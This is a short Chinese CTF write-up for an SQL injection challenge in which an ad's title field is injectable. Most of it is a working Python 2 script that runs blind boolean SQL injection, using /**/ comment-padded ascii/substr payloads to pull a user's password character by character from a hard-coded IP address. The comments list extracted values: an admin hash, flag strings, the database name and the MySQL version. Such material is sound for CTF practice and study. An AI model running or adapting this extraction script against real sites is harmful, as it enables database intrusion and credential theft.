知识点:
sql注入
注入点 0'/**/||/**/ascii(substr((select/**/pass/**/from/**/users/**/where/**/name='flag'),0,1))/**/>/**/ascii('53')/**/||/**/'0
先注册个用户,然后发布广告
广告的title可以注入
注入脚本
# coding=utf-8
import re
import requests
import sys
import time
reload(sys)
sys.setdefaultencoding("utf8")
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0",
"Cookie": "PHPSESSID=0lr6ck9sarpj2i9u8upp9r9nbe"
}
url = "http://211.159.177.185:23456/"
add_url = url + "addads.php"
clear_url = url + "empty.php"
r = requests.session()
s = r.get(url=url, headers=header)
str_str = '0123456789abcdef'
# str_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.,/!@#$%^&*`.'
flag = ""
for i in range(1, 40):
for j in str_str:
title = "0'/**/||/**/ascii(substr((select/**/pass/**/from/**/users/**/where/**/name='flag')," + str(
i) + ",1))/**/>/**/ascii('" + j + "')/**/||/**/'0"
# title="0'/**/||/**/ascii(substr((select/**/version()),"+str(i)+",1))/**/>/**/ascii('"+j+"')/**/||/**/'0"
# title="0'/**/||/**/ascii(substr((database()),"+str(i)+",1))/**/>/**/ascii('"+j+"')/**/||/**/'0"
data = {
'title': title,
'content': 'aaaaa',
'ac': 'add'
}
s_add = r.post(url=add_url, headers=header, data=data)
s = r.get(url=url, headers=header)
#print s.text
id = re.search(r'detail.php\?id=(.*)\'>', s.text).group(1)
id_url = url + 'detail.php?id=' + id
#print id_url
s1 = r.get(url=id_url, headers=header)
#print s1.text
if 'ckckckc' not in s1.text:
flag += j
print flag
s2 = r.get(url=clear_url, headers=header)
break
else:
# print 'no'
s2 = r.get(url=clear_url, headers=header)
#time.sleep(2)
# 库名 web1
# admin密码 53e217ad4c721eb9565cf25a5ec3b66e
# 账号 密码
# flag f8ae51b4f44b623f665539af7d2b83f9
# admin 53e217ad4c721eb9565cf25a5ec3b66e
# fa2a0ad3ee00aa702e640afbc097e501cce
# secure_file_priv /var/lib/mysql/files
# version 8.0.17